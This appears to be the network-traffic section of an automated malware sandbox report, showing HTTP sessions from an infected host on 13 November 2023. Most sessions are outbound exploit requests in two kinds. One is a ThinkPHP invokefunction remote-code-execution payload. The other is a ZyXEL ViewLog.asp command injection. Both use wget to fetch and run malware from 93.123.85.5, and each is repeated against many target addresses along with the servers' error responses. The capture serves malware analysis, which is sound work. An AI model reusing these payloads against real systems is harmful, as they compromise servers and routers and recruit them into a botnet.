                                                              Mime-Version: 1.0
                                                              Content-Type: text/html
                                                              Content-Length: 258
                                                              Expires: Mon, 13 Nov 2023 21:20:16 GMT
                                                              Date: Mon, 13 Nov 2023 21:20:16 GMT
                                                              Connection: close
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 65 30 35 30 38 63 34 66 26 23 34 36 3b 31 36 39 39 39 31 30 34 31 36 26 23 34 36 3b 31 38 37 66 63 35 39 61 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;e0508c4f&#46;1699910416&#46;187fc59a</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              872192.168.2.234347888.86.208.13080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:16.197163105 CET16911OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:16.560142040 CET16920INHTTP/1.1 505 HTTP Version not supported
                                                              Content-Type: text/html;charset=UTF-8
                                                              Content-Length: 0
                                                              Connection: close
                                                              Cache-control: no-cache


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              873192.168.2.2350244112.126.249.13480
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:16.492671013 CET16917OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:16.807003975 CET16945INHTTP/1.1 400 Bad Request
                                                              Date: Mon, 13 Nov 2023 21:20:21 GMT
                                                              Server: Apache
                                                              Content-Length: 11
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 42 61 64 20 52 65 71 75 65 73 74
                                                              Data Ascii: Bad Request


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              874192.168.2.2341446112.124.183.11780
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:16.499099016 CET16918OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:16.820067883 CET16955INHTTP/1.1 400 Bad Request
                                                              Date: Mon, 13 Nov 2023 21:20:10 GMT
                                                              Server: Apache
                                                              Vary: Accept-Encoding
                                                              Content-Length: 11
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 42 61 64 20 52 65 71 75 65 73 74
                                                              Data Ascii: Bad Request


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              875192.168.2.233667031.136.157.938080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:17.355449915 CET17036OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:18.371409893 CET17168OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:20.387109995 CET17421OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:24.386559010 CET17916OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:32.577490091 CET18903OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:48.703489065 CET20667OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:21:20.955089092 CET20713OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              876192.168.2.235165694.120.33.478080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:17.369723082 CET17037OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              877192.168.2.234037031.41.161.2088080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:17.373801947 CET17038OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:17.723126888 CET17129INHTTP/1.1 500 Internal Server Error
                                                              Content-Type: text/html; charset=utf-8
                                                              Content-Length: 130
                                                              Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                              Data Ascii: <html><head><title>500 Internal Server Error</title></head><body><center><h1>500 Internal Server Error</h1></center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              878192.168.2.235351494.41.86.2318080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:17.393306971 CET17039OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:17.958375931 CET17146INHTTP/1.1 401 Unauthorized
                                                              Server: Web server
                                                              Date: Mon, 13 Nov 2023 21:20:17 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 193
                                                              Connection: keep-alive
                                                              WWW-Authenticate: Digest realm="ZyXEL Keenetic Omni", nonce="PZRSZfImrG3kfkUUPTFNUCkMqfVQof9A", qop="auth"
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 31 20 41 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 31 20 41 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 65 62 20 73 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>401 Authorization Required</title></head><body bgcolor="white"><center><h1>401 Authorization Required</h1></center><hr><center>Web server</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              879192.168.2.233760494.123.182.968080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:17.713926077 CET17128OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              88192.168.2.235734688.204.18.23780
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:22.304907084 CET2825OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:22.663731098 CET2832INHTTP/1.1 400 Bad Request
                                                              Content-Type: text/plain; charset=utf-8
                                                              Connection: close
                                                              Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                              Data Ascii: 400 Bad Request


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              880192.168.2.235691062.29.15.758080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:17.718511105 CET17128OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              881192.168.2.2339160112.125.212.23380
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:18.140465975 CET17162OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:18.453583002 CET17173INHTTP/1.1 400 Bad Request
                                                              Content-Type: text/html; charset=us-ascii
                                                              Server: Microsoft-HTTPAPI/2.0
                                                              Date: Mon, 13 Nov 2023 21:16:46 GMT
                                                              Connection: close
                                                              Content-Length: 311
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              882192.168.2.2354388112.126.158.12180
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:18.141238928 CET17163OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:18.455389977 CET17174INHTTP/1.1 400 Bad Request
                                                              Content-Type: text/html; charset=us-ascii
                                                              Server: Microsoft-HTTPAPI/2.0
                                                              Date: Mon, 13 Nov 2023 21:17:26 GMT
                                                              Connection: close
                                                              Content-Length: 311
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              883192.168.2.2345096112.74.183.15480
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:18.154254913 CET17163OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:18.480001926 CET17175INHTTP/1.1 400 Bad Request
                                                              Server: nginx
                                                              Date: Mon, 13 Nov 2023 21:20:18 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 150
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              884192.168.2.235591694.122.18.1208080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:18.394376993 CET17169OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              885192.168.2.233352094.121.150.2278080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:18.396301031 CET17170OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              886192.168.2.234179094.121.152.368080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:18.399331093 CET17170OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              887192.168.2.235200895.100.78.18180
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:18.440779924 CET17171OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
